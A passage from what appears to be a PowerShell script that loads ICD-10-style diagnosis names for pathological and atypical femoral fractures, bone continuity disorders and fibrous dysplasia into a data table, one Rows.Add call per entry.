hand","Pathological fracture in other disease, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right hand","Pathological fracture in other disease, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right hand","Pathological fracture in other disease, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right hand","Pathological fracture in other disease, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left hand","Pathological fracture in other disease, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified hand","Pathological fracture in other disease, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, pelvis","Pathological fracture in other disease, pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right femur","Pathological fracture in other disease, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left femur","Pathological fracture in other disease, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified femur","Pathological fracture in other disease, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, hip, unspecified","Pathological fracture in other disease, hip, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right tibia","Pathological fracture in other disease, right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left tibia","Pathological fracture in other disease, left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right fibula","Pathological fracture in other disease, right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left fibula","Pathological fracture in other disease, left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified tibia and fibula","Pathological fracture in other disease, unspecified tibia and fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ankle","Pathological fracture in other disease, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ankle","Pathological fracture in other disease, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ankle","Pathological fracture in other disease, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right foot","Pathological fracture in other disease, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left foot","Pathological fracture in other disease, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified foot","Pathological fracture in other disease, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, other site","Pathological fracture in other disease, other site, sequela") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Atypical femoral fracture, unspecified","Atypical femoral fracture, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, right leg","Incomplete atypical femoral fracture, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, left leg","Incomplete atypical femoral fracture, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incomplete atypical femoral fracture, unspecified leg","Incomplete atypical femoral fracture, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, right leg","Complete transverse atypical femoral fracture, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, left leg","Complete transverse atypical femoral fracture, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete transverse atypical femoral fracture, unspecified leg","Complete transverse atypical femoral fracture, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, right leg","Complete oblique atypical femoral fracture, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, left leg","Complete oblique atypical femoral fracture, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Complete oblique atypical femoral fracture, unspecified leg","Complete oblique atypical femoral fracture, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone","Other disorders of continuity of bone, unspecified site") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, shoulder","Other disorders of continuity of bone, right shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, shoulder","Other disorders of continuity of bone, left shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, shoulder","Other disorders of continuity of bone, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, humerus","Other disorders of continuity of bone, right humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, humerus","Other disorders of continuity of bone, left humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, humerus","Other disorders of continuity of bone, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ulna and radius","Other disorders of continuity of bone, right ulna") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ulna and radius","Other disorders of continuity of bone, left ulna") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ulna and radius","Other disorders of continuity of bone, right radius") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ulna and radius","Other disorders of continuity of bone, left radius") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ulna and radius","Other disorders of continuity of bone, unspecified ulna and radius") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, hand","Other disorders of continuity of bone, right hand") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, hand","Other disorders of continuity of bone, left hand") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, hand","Other disorders of continuity of bone, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, pelvic region and thigh","Other disorders of continuity of bone, right pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, pelvic region and thigh","Other disorders of continuity of bone, left pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, pelvic region and thigh","Other disorders of continuity of bone, unspecified pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, tibia and fibula","Other disorders of continuity of bone, right tibia") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, tibia and fibula","Other disorders of continuity of bone, left tibia") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, tibia and fibula","Other disorders of continuity of bone, right fibula") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, tibia and fibula","Other disorders of continuity of bone, left fibula") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, tibia and fibula","Other disorders of continuity of bone, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ankle and foot","Other disorders of continuity of bone, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ankle and foot","Other disorders of continuity of bone, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, ankle and foot","Other disorders of continuity of bone, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of continuity of bone, other site","Other disorders of continuity of bone, other site") + $null = $DiagnosisList.Rows.Add("Disorder of continuity of bone, unspecified","Disorder of continuity of bone, unspecified") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic)","Fibrous dysplasia (monostotic), unspecified site") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), shoulder","Fibrous dysplasia (monostotic), right shoulder") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), shoulder","Fibrous dysplasia (monostotic), left shoulder") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), shoulder","Fibrous dysplasia (monostotic), unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), upper arm","Fibrous dysplasia (monostotic), right upper arm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), upper arm","Fibrous dysplasia (monostotic), left upper arm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), upper arm","Fibrous dysplasia (monostotic), unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), forearm","Fibrous dysplasia (monostotic), right forearm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), forearm","Fibrous dysplasia (monostotic), left forearm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), forearm","Fibrous dysplasia (monostotic), unspecified forearm") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), hand","Fibrous dysplasia (monostotic), right hand") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), hand","Fibrous dysplasia (monostotic), left hand") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), hand","Fibrous dysplasia (monostotic), unspecified hand") + $null = 